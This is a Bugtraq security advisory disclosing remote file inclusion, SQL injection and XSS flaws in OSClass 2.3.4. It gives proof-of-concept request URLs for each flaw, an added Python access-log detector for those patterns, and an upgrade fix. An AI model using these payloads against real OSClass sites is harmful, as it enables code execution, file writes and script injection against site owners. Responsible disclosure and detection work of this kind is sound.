List: bugtraq
Subject: Multiple vulnerabilities in OSClass
From: Filippo Cavallarin <filippo.cavallarin () codseq ! it>
Date: 2012-01-30 12:31:58
Message-ID: 9FD841D6-CBAF-4238-9030-603BBF29384F () codseq ! it
Advisory ID: CSA-12003
Title: Multiple vulnerabilities in OSClass
Product: OSClass
Version: 2.3.4 and probably prior
Vendor: osclass.org
Vulnerability type: SQL injection, XSS, Remote file inclusion
Vendor notification: 2012-01-12
Public disclosure: 2012-01-27
OSClass version 2.3.4 and probably below suffers from multiple vulnerabilities:
1) Remote file inclusion in osc_downloadFile(). This vulnerability allows an attacker to put an arbitrary file (i.e. a malicious PHP script) on the server under the www root, so it is possible to execute shell commands with the privileges of the webserver. An attacker must be logged in as admin to exploit this vulnerability.
http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php
http://127.0.0.1/osclass/oc-content/downloads/tmp.php
2) SQL injection in admin's ajax interface when performing the "edit_category_post" action. The GET parameter id is not sanitized. An attacker must be logged in as admin to exploit this vulnerability; magic_quotes_gpc must be off.
http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201
3) SQL injection in admin's ajax interface when performing the "enable_category" action. The GET parameter id is not sanitized. An attacker must be logged in as admin to exploit this vulnerability.
http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201
(id must be a valid subcategory id; in this case magic_quotes_gpc can be on)
4) XSS in admin's ajax interface. The GET parameter id is not sanitized.
An attacker must be logged in as admin to exploit this vulnerability.
http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E
(id must be a valid category id)
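The four request shapes above share two signals a defender can look for in the web-server access log: action=upgrade with a URL scheme in file= (the RFI), and a category action whose id is not a plain integer (the SQL injection and XSS). The following is an added detection helper, not OSClass code or part of the advisory; the log lines are constructed, the non-numeric-id heuristic is an assumption, and the oc-admin path and parameter names are taken from the advisory's URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines: the advisory's three request shapes plus two benign ones.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Jan/2012:12:31:58 +0100] "GET /osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php HTTP/1.1" 200 512
10.0.0.5 - - [30/Jan/2012:12:32:10 +0100] "GET /osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201 HTTP/1.1" 200 88
10.0.0.5 - - [30/Jan/2012:12:32:20 +0100] "GET /osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E HTTP/1.1" 200 88
10.0.0.9 - - [30/Jan/2012:12:33:00 +0100] "GET /osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2 HTTP/1.1" 200 88
10.0.0.9 - - [30/Jan/2012:12:33:05 +0100] "GET /osclass/index.php?page=search HTTP/1.1" 200 4096
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
ID_ACTIONS = {"edit_category_post", "enable_category"}  # actions whose id must be an integer

def classify(path):
    """Label one request path: 'rfi:...', 'sqli:...', 'xss:...' or None if benign."""
    parts = urlsplit(path)
    if not parts.path.endswith("/oc-admin/index.php"):
        return None
    q = parse_qs(parts.query)  # percent-decodes values
    if q.get("page", [""])[0] != "ajax":
        return None
    action = q.get("action", [""])[0]
    if action == "upgrade":
        # osc_downloadFile() accepted a URL here; a scheme in file= is the RFI pattern
        if re.match(r"^[a-z][a-z0-9+.-]*://", q.get("file", [""])[0], re.I):
            return "rfi:upgrade"
    if action in ID_ACTIONS:
        ident = q.get("id", [""])[0]
        if not re.fullmatch(r"\d+", ident):
            # a tag in the id points at the XSS; anything else non-numeric is treated as SQLi
            return ("xss:" if re.search(r"[<>]", ident) else "sqli:") + action
    return None

def scan_log(text):
    """Return (line_number, label, path) for every suspicious request in the log text."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m:
            label = classify(m.group(1))
            if label:
                findings.append((n, label, m.group(1)))
    return findings

if __name__ == "__main__":
    for n, label, path in scan_log(SAMPLE_LOG):
        print(f"line {n}: {label}  {path}")
```

Because the advisory notes the attacker must already be an admin, a hit here is most useful correlated with the authenticated admin session that issued it.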
Solution
Upgrade to OSClass 2.3.5
http://osclass.org/2012/01/16/osclass-2-3-5/
Filippo Cavallarin
C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin@codseq.it